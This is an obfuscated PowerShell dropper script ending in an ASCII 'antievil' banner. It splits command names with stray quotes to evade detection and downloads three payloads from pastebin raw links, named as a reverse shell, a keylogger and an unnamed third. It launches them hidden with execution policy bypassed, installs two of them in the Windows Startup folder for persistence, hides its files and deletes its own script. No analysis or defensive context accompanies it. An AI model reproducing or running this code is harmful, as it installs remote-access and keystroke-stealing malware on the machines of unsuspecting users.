cd /;
mkdir \win64;
cd win''64;
wg''et "pastebin.com/raw/13sP5sz4" -OutFile pyld_rv.p''s1; # rgbwiki.com
wg''et "pastebin.com/raw/F5GjFZWK" -OutFile pyld_kl.p''s1; # hinchley.net
wg''et "pastebin.com/raw/sWntDax3" -OutFile pyld_ds.p''s1;
'(cmd /c start /min "" powe""rshe""ll -Windo""wStyle Hid""den -Execu""tionPolicy By""Pass -File "c:/win64/pyld_rv.ps1")' | Out-F''ile init_rv.ba''t -Encoding ascii;
'(cmd /c start /min "" powe""rshe""ll -Windo""wStyle Hid""den -Execu""tionPolicy By""Pass -File "c:/win64/pyld_kl.ps1")' | Out-F''ile init_kl.ba''t -Encoding ascii;
'(cmd /c start /min "" powe""rshe""ll -Windo""wStyle Hid""den -Execu""tionPolicy By""Pass -File "c:/win64/pyld_ds.ps1")' | Out-F''ile init_ds.ba''t -Encoding ascii;
.\init_rv.ba''t;
.\init_kl.ba''t;
cd "$env:appdata/microsoft/windows/start menu/programs/startup";
copy "c:\win64\init_rv.bat" .;
copy "c:\win64\init_kl.bat" .;
attrib +h init_rv.ba''t;
attrib +h init_kl.ba''t;
cd /win64;
attrib +h;
attrib +h .;
powe""rshe""ll rm ~/anti.ps1 -Force;
exit;:"

                       /$$     /$$                      /$$ /$$
                      | $$    |__/                     |__/| $$
  /$$$$$$  /$$$$$$$  /$$$$$$   /$$  /$$$$$$  /$$    /$$ /$$| $$
 |____  $$| $$__  $$|_  $$_/  | $$ /$$__  $$|  $$  /$$/| $$| $$
  /$$$$$$$| $$  \ $$  | $$    | $$| $$$$$$$$ \  $$/$$/ | $$| $$
 /$$__  $$| $$  | $$  | $$ /$$| $$| $$_____/  \  $$$/  | $$| $$
|  $$$$$$$| $$  | $$  |  $$$$/| $$|  $$$$$$$   \  $/   | $$| $$
 \_______/|__/  |__/   \___/  |__/ \_______/    \_/    |__/|__"
